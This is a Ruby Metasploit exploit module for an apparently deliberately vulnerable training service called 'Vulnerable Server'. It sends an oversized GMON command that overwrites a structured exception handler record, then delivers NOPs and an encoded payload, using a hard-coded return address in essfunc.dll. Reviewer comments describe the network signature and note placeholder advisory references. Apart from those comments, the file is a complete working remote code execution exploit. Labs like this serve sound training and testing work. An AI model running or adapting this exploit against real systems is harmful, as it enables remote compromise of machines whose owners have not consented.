- ## Metasploit To Max
- # http://metasploit.com/framework/
- ##
- require 'msf/core'
# Metasploit remote exploit module for the service the page calls
# "Vulnerable Server". It sends one oversized `GMON` command over TCP and
# relies on overwriting a structured exception handler (SEH) record.
#
# Defensive reading: the whole attack is a single TCP write that begins with
# the literal `GMON /` and carries several kilobytes after it (3498 filler
# bytes, then the SEH record, NOPs and payload). An oversized GMON command on
# the service port (default 9999 here) is therefore the observable network
# trait. The return address is hard-coded to an address inside essfunc.dll,
# so the module only fits a build where that DLL loads at this fixed base.
# NOTE(review): that presumably means the DLL is built without ASLR/SafeSEH;
# confirm against the binary before relying on it.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  # Registers the module metadata and the default remote port.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values declared below via update_info
  def initialize(info = {})
    # Author strings are reproduced exactly, including the leading space.
    authors = [
      'Ninja-Security Team <admin[at]ninja-sec.org>',
      ' Anti-Trust', # MSF Module
    ]

    # NOTE(review): the OSVDB and CVE entries carry empty identifiers; they
    # are placeholders and do not point at any advisory.
    references = [
      [ 'OSVDB', '' ],
      [ 'CVE', '' ],
      [ 'URL', 'http://ninja-sec.org' ]
    ]

    default_options = {
      'ExitFunction' => 'process', # none/process/thread/seh
      # 'InitialAutoRunScript' => 'migrate -f',
    }

    # Bytes the payload encoder must avoid: NUL, LF and CR.
    payload_settings = {
      'BadChars' => "\x00\x0a\x0d",
      'DisableNops' => true,
    }

    # Single target; both values are specific to that build.
    supported_targets = [
      [ 'WINDOWS XP SP3',
        {
          'Ret' => 0x625011b3, # pop eax # pop eax # ret - essfunc.dll
          'Offset' => 3498
        }
      ],
    ]

    module_info = {
      'Name' => 'Vulnerable Server SEH Exploit',
      'Description' => %q{
        Vulnerable Server SEH Exploit
      },
      'License' => MSF_LICENSE,
      'Author' => authors,
      'References' => references,
      'DefaultOptions' => default_options,
      'Platform' => 'win',
      'Payload' => payload_settings,
      'Targets' => supported_targets,
      'Privileged' => false,
      'DisclosureDate' => 'Sep 24 2012',
      'DefaultTarget' => 0
    }

    super(update_info(info, module_info))

    register_options([Opt::RPORT(9999)], self.class)
  end

  # Connects, builds the GMON argument and sends it in one write, then hands
  # control to the payload handler and closes the socket.
  def exploit
    connect

    # Layout, in order: random filler of target['Offset'] bytes, the SEH
    # record built from the target's return address, 30 NOPs, the encoded
    # payload. The appends run left to right, as in the original.
    gmon_argument = rand_text(target['Offset'])
    gmon_argument << generate_seh_record(target.ret) << make_nops(30) << payload.encoded

    print_status("Trying target #{target.name}...")

    request = 'GMON /' + gmon_argument
    sock.put(request)

    handler
    disconnect
  end
end